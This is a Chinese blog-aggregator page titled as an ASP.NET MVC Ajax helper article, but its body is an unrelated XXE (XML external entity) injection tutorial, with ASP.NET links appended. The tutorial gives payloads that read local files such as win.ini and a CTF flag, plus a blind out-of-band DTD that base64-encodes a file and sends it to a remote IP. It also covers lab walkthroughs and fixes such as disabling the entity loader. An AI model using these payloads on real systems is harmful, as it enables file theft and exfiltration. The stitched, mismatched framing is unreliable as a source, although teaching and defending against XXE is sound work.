2. 程式人生 > 其它 >ASP.NET MVC如何使用Ajax的輔助方法

ASP.NET MVC如何使用Ajax的輔助方法

阿新 發佈:2021-01-09

一.XXE的原理

運維人員使用了低版本php,libxml低於2.9.1就會造成XXE或者程式設計師設定了libxml_disable_entity_loader(FALSE);

要點:libxml2.9.1及以後,預設不解析外部實體。測試的時候windows下使用的是php5.2(libxml Version 2.7.7 ), php5.3(libxml Version 2.7.8)。Linux中需要將libxml低於libxml2.9.1的版本編譯到PHP中,可以使用phpinfo()檢視libxml的版本資訊。

如圖,libxml低於2.9.1,說明存在XXE漏洞

二.XXE的定義

XML用於標記電子檔案使其具有結構性的標記語言,可以用來標記資料、定義資料型別,是一種允許使用者對自己的標記語言進行定義的源語言。XML文件結構包括XML宣告、DTD文件型別定義(可選)、文件元素。

三.XXE的文件結構

<?xml version=”1.0” encoding="gb2312" encoding=”UTF-8”?>

xml宣告、版本(gb2312表示中國)、編碼(UTF-8指的是萬能編碼,它支援各個國家的語言)

<!DOCTYPE root system "http://www.XXXX.com/file"[ ...

定義DTD檔案,格式為:root指定根節點名稱,system宣告要使用的外部DTD檔案路徑,後面加檔案URL,注意[]包裹。

<!ELEMENT root (other)> ...

元素宣告,宣告xml中包含的元素,宣告中需要指定元素名稱(root、other等)和元素類別、內容等

四.DTD的基礎知識

基本的PAYLOAD結構:

DTD實體宣告

內部實體宣告

示例:

<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe"oldboyedu.com">]>
<foo>&xxe;</foo>

外部實體宣告

任何語言都支援file、http、ftp協議

示例:

<!DOCTYPE foo [<!ELEMENT foo ANY >
 


<!ENTITY xxe SYSTEM"file:///c:/windows/win.ini">]>

<foo>&xxe;</foo>

引數實體宣告

示例:

<!DOCTYPE foo [<!ELEMENT foo ANY >

<!ENTITY % xxe SYSTEM"http://192.168.0.105:8080/evil.dtd">

%xxe;]>

<foo>&evil;</foo>

五.XXE攻擊

有回顯情況

示例:

<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM"http://xxx.xxx.xxx/evil.dtd">
%xxe;]>
<foo>&evil;</foo>

無回顯情況

建立*.dtd

示例:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.0.105:8080?p=%file;'>">

定義DTD檔案上傳到伺服器,然後呼叫就可以了

xml呼叫

示例:

<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://ip/test.dtd">
%remote;%int;%send;
]>

把顯示在日誌裡的結果通過burp suite解密

六.XXE漏洞利用及相關擴充套件知識

pikachu xxe程式碼

<?xml version = "1.0"?>

<!DOCTYPE ANY [

<!ENTITY f SYSTEM "file:///C://1.txt">

]>

<x>&f;</x>

示例:

開啟pikachu,通過Burp suite 抓包(1.挖XXE漏洞首先找有引數的地方2.看他的accept頭允許哪種語言,發現xml說明允許xml提交語言3.可以在引數出隨意輸入值(因為引數沒有過濾,其次libxml低於2.9)

還有一種方法就是看xml後面是否是XXE編碼

找到漏洞後,輸入程式碼:<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///C://2.txt"> ]> <x>&f;</x>

jarvisoj上的一道題目API呼叫

這道題的題目說明是 請設法獲得目標機器/home/ctf/flag.txt中的flag值。

進入題目http://web.jarvisoj.com:9882/發現一個輸入框,我們對其進行抓包

把json改為xml,把最後一行復製為

<?xml version = "1.0"?>
<!DOCTYPE xxe [
<!ENTITY file SYSTEM "file:///home/ctf/flag.txt">
]>
<x>&file;</x>

七.XXE漏洞修復與防禦

複製一行程式碼

libxml_disable_entity_loader(true);

升級為高版本

手動黑名單過濾

過濾關鍵詞:<!DOCTYPE<!ENTITY SYSTEMPUBLIC

相關推薦

asp.net mvc 輔助方法

最直觀的便是舉例說明,請看下面: @Html.TextBox(“name”,\"value\",new{id=\"testid\",@class=\"testclass\"})

ASP.NET MVC如何使用Ajax的輔助方法

前言:前面我們已經簡單的介紹過了MVC如何Jquery,因為我們如果使用Ajax的話必須要了解Jquery,這篇部落格我們將大致瞭解一下ASP.NET MVC如何使用Ajax的輔助方法,此部落格是我的讀書筆記,如果那裡寫的不好,

asp.net全域性變數的例項方法

asp.net獲取全域性變數方法 第一種,首先開啟visual studio,新建web專案。 其次,在新建的web專案中,開啟“web.config”檔案,在此檔案中新增關鍵字“<appSettings>”標記,如下圖所示。

ASP.NET Core Mvc整合MarkDown的方法

  這幾天在做文章編輯,首先就想到了markdown,它比其它的都要新,而且很好用,相對於其它的html編輯器,好久不更新,要好得多,哦~對了我現在已經用上新版的Edge了,經過很多朋友測試,效能比谷歌瀏覽器都要好很多

ASP.NET Core3.1遷移到5.0的方法

3月中旬,微軟官方已經發布了dotnet 5的第一個預覽版:5.0.0-preview.1。 dotnet core經過前幾個版本的發展和沉澱,到3.1已經基本趨於穩定。

ASP.NET Core單檔案和多檔案上傳並儲存到服務端的方法

前言:   在我們日常開發中,關於圖片,視訊,音訊,文件等相關檔案上傳並儲存到服務端中是非常常見的一個功能,今天主要是把自己在開發中常用的兩種方式記錄下來方便一下直接使用,並且希望能夠幫助到有需要的同

ASP.NET Core MVC獲取請求的引數方法示例

前言 一次HTTP請求,就是一次標準IO操作。請求是I,是輸入;響應式O,是輸出。任何web開發框架,其實都是在幹這兩件事:

ASP.NET生成驗證碼的方法

本文例項為大家分享了ASP.NET生成驗證碼的具體程式碼,供大家參考,具體內容如下

轉:關於ASP.NET中WEBAPI中POST請求中FromBody修飾的string型別的引數伺服器端獲取不到值FromBody空值的簡單解決方法

其實解決辦法很簡單,就是POST請求的時候,來自實體的引數,content-type:application/x-www-form-urlencoded情況下,是預設按照鍵值對來解析的,比如paramname=paramvalue的形式,但是這裡有個隱形的要求就是fromb

ASP.NET開源匯入匯出庫Magicodes.IE完成Csv匯入匯出的方法

說明 本章主要說明如何使用Magicodes.IE.Csv進行Csv匯入匯出. 關於Magicodes.IE 匯入匯出通用庫,通過匯入匯出DTO模型來控制匯入和匯出,支援Excel、Word、Pdf和Html。

asp.net core 修改預設埠的幾種方法

  一般情況下,aspnetcore釋出後的預設埠是5000,這個大家都知道,而且預設骨架程式碼中沒有看到任何讓你輸入的ip地址和埠號,但作為程式設計師的我們,不希望

請寫出在ASP.NET中常用的幾種頁面間傳值的方法,並說出它們的特點。

QueryString 傳遞一個或多個安全性要求不高或是結構簡單的數值。但是對於傳遞陣列或物件的話,就不能用這個方法

[Asp.Net Core]提高開發效率的方法

一、概述 在園子裡面有很多關於各種技術細節的研究文章,都是比較牛逼的框架研究;但是一直沒有看到關於怎麼樣提高開發效率的文章,大多提高開發效率的文章都是關於自動化等方面的輔助工具型別的,而不是開發中的一

ASP.NET WebAPI 使用Swagger使用方法 ,不是.net core

描述 ASP.NET WebAPI這塊沒有文件,主要是一些老的專案,新的.net coreweb apiswagger很方便,下面主要是對ASP.NET WebAPI使用 swagger操作

asp.net core 3.1 Cookie的公共方法

/// <summary> /// 沐雪微淘小程式商城 /// cookie設定 /// </summary> public static class CookieHelper

asp.net core 3.1 公共類裡獲取 HttpContext 的方法

場景: 在開發web專案的時候,寫一些通用的公共方法是很常見的操作,而一些關於Http的操作,經常會用到HttpContext這個物件。

ASP.NET在MVC控制器中獲取Form表單值的方法

在網站開發中我們經常需要用到表單,那麼,在前臺頁面的表單中提交到後臺控制器後,後臺控制器如何接收表單提交過來的資料呢?下面我們介紹幾種常用的方法

ASP.NET 上傳檔案方法

一、ASP.NET MVC 實現上傳下載 1.首先是Form表單提交 前臺: <form action=\'@Url.Action(\"Upload\", \"File\")\' method=\"post\" enctype=\"multipart/form-data\"> <input type=\"file\" name=\"

ASP.NET WebAPI2複雜請求跨域設定的方法介紹

ASP.Net Core的跨域設定比較簡單 官方都整合了 具體的參見微軟官方文件: https://docs.microsoft.com/zh-cn/aspnet/core/security/cors?view=aspnetcore-3.1#ecors

asp.net core Webapi 3.1 上傳檔案的多種方法(附大檔案上傳) 以及swagger ui 上傳檔案

asp.net core Webapi是有多種上傳檔案的方法的 另外swagger ui也可以選擇檔案來上傳檔案